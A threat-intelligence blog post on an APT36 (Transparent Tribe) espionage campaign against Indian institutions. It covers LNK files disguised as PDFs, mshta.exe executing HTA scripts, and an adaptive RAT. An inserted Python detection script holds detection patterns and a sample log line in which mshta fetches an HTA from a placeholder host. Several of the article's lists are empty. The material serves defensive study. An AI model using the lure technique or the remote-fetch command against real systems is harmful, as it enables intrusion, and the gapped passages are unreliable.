If you thought some cyber espionage groups had disappeared, this case proves the opposite. Transparent Tribe, also known as APT36, has resurfaced with a new wave of targeted attacks against government agencies, universities, and strategic entities in India. This time, the group is using increasingly sophisticated techniques designed to remain stealthy and persist inside compromised systems for long periods.
At TecnetOne, we closely track these operations because they often anticipate trends that eventually spread to other countries and sectors.
Transparent Tribe is not a new actor. It is an Advanced Persistent Threat (APT) group that has been active since at least 2013, specializing in cyber espionage campaigns. Historically, its primary focus has been India, targeting government, academic, and strategic institutions.
Unlike more high-profile groups, APT36 has maintained a relatively low profile, but with consistent and highly targeted activity. Its mission is not quick financial fraud or noisy ransomware attacks, but rather the silent collection of sensitive intelligence.
The most recent campaign, analyzed by cybersecurity firm CYFIRMA, begins with a technique that remains surprisingly effective: spear phishing.
Victims receive an email that appears legitimate and is tailored specifically to them or their organization. The message includes a ZIP file containing what looks like an official PDF document—but it isn’t.
The file is actually a Windows shortcut (LNK) disguised as a real PDF. It even displays the full content of the document when opened, avoiding suspicion.
Opening the file does not launch a standard PDF viewer. Instead, the system silently executes an HTA (HTML Application) script using mshta.exe, a legitimate Windows tool frequently abused by attackers because it often evades security controls.
This script:
While you read the document, the attacker is already inside your system.
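The chain described above (a ZIP-delivered shortcut named like a PDF, then mshta.exe running an HTA while a decoy document is shown) leaves two things a defender can check for: the file name pattern and the process lineage. The following is an added example, not code from TecnetOne or from the CYFIRMA report. It assumes a generic key=value process-creation log format with fields `ts`, `host`, `parent`, `image` and `cmd`; the sample log lines are constructed for the example, and the list of user-facing parent processes is an assumption you would tune to your own telemetry.

```python
"""Flag the LNK-disguised-as-PDF / mshta.exe pattern in process-creation logs.

Added example, not from the original article. Log format, field names and
the sample events below are assumptions constructed for illustration.
"""
import re

# Constructed sample events (NOT real telemetry). Assumed key=value layout.
SAMPLE_EVENTS = [
    'ts=2024-01-10T09:12:03Z host=ws01 parent=explorer.exe '
    'image=C:\\Windows\\System32\\mshta.exe '
    'cmd="mshta.exe C:\\Users\\u\\AppData\\Local\\Temp\\update.hta"',
    'ts=2024-01-10T09:12:05Z host=ws01 parent=mshta.exe '
    'image=C:\\Windows\\System32\\cmd.exe cmd="cmd.exe /c start report.pdf"',
    'ts=2024-01-10T09:30:00Z host=ws02 parent=explorer.exe '
    'image=C:\\Tools\\Reader\\reader.exe '
    'cmd="reader.exe C:\\Users\\u\\Downloads\\budget.pdf"',
    'ts=2024-01-10T10:01:44Z host=ws03 parent=winword.exe '
    'image=C:\\Windows\\System32\\mshta.exe '
    'cmd="mshta.exe https://placeholder.example/lure.hta"',
]

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Document-looking inner extensions that make a .lnk suspicious (assumed list).
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx"}

# Processes from which a user normally opens attachments (assumed list).
USER_FACING_PARENTS = {"explorer.exe", "winword.exe", "excel.exe",
                       "outlook.exe", "powerpnt.exe"}


def parse_event(line):
    """Parse one key=value log line into a dict, stripping quotes from values."""
    return {key: value.strip('"') for key, value in KV_RE.findall(line)}


def looks_like_disguised_lnk(filename):
    """True for a shortcut named like a document, e.g. notice.pdf.lnk."""
    name = filename.lower()
    if not name.endswith(".lnk"):
        return False
    stem = name[:-len(".lnk")]
    return any(stem.endswith(ext) for ext in DOC_EXTS)


def classify_event(ev):
    """Return a finding dict for suspicious mshta.exe launches, else None."""
    image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
    if image != "mshta.exe":
        return None
    parent = ev.get("parent", "").lower()
    cmd = ev.get("cmd", "").lower()
    reasons = []
    if parent in USER_FACING_PARENTS:
        reasons.append(f"mshta.exe spawned by user-facing process {parent}")
    if ".hta" in cmd:
        reasons.append("command line references an .hta payload")
    if re.search(r"https?://", cmd):
        reasons.append("command line pulls content from a URL")
    if not reasons:
        return None
    return {
        "ts": ev.get("ts"),
        "host": ev.get("host"),
        "severity": "high" if len(reasons) > 1 else "medium",
        "reasons": reasons,
    }


def scan(lines):
    """Run classify_event over raw log lines and collect the findings."""
    findings = []
    for line in lines:
        finding = classify_event(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["ts"], f["host"], f["severity"], "; ".join(f["reasons"]))
    print("notice.pdf.lnk suspicious:", looks_like_disguised_lnk("notice.pdf.lnk"))
```

The mshta.exe launch itself is not always malicious, so the rule scores on lineage and arguments together rather than on the binary alone; the decoy document being opened afterwards (the second sample event) is not flagged, which is the intended behaviour since the alert has already fired on its parent.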
One of the most disturbing aspects of this campaign is the malware’s adaptive behavior. The RAT adjusts its persistence mechanisms based on the antivirus software detected on the infected system.
For example:
This demonstrates a high level of development and deep knowledge of the Windows ecosystem.
The main malicious file, identified as iinneldc.dll, functions as a fully capable RAT. Once active, attackers can:
In short, the system is no longer under the user’s control.
According to CYFIRMA, APT36 remains a highly persistent and strategic threat, with a clear focus on:
The objective is not disruption, but long-term intelligence gathering, which is particularly concerning when universities and research institutions are involved.
This is not the only recent operation attributed to Transparent Tribe. In previous weeks, researchers identified another campaign using an LNK file disguised as an official government notice, allegedly related to WhatsApp.
The lure was especially clever: a legitimate security advisory issued by Pakistan’s CERT regarding a fraud campaign. In other words, attackers weaponized a real security warning to infect systems.
Once deployed, the malware connects to a carefully designed command-and-control (C2) infrastructure, using:
Even if some C2 servers are currently inactive, the persistence mechanisms ensure that access can be reactivated at any time.
The report also links recent activity from Patchwork (another APT group believed to be of Indian origin) to a new trojan called StreamSpy.
This malware combines:
The trend is clear: APT groups are modernizing their toolkits, sharing resources, and refining evasion techniques.
Even though these attacks target India, the techniques used are universal. At TecnetOne, we highlight several critical lessons:
Transparent Tribe proves that cyber espionage is not only alive, but constantly evolving. Groups like APT36 operate with patience, precision, and clearly defined objectives.
If this case makes anything clear, it’s that the most dangerous threats don’t always come with visible ransomware or extortion messages. Sometimes, the greatest risk is the attacker who enters quietly—and stays.
At TecnetOne, we believe that understanding these campaigns isn’t just about staying informed—it’s about anticipating what comes next. Because in cybersecurity, the adversary attacking others today may be targeting you tomorrow.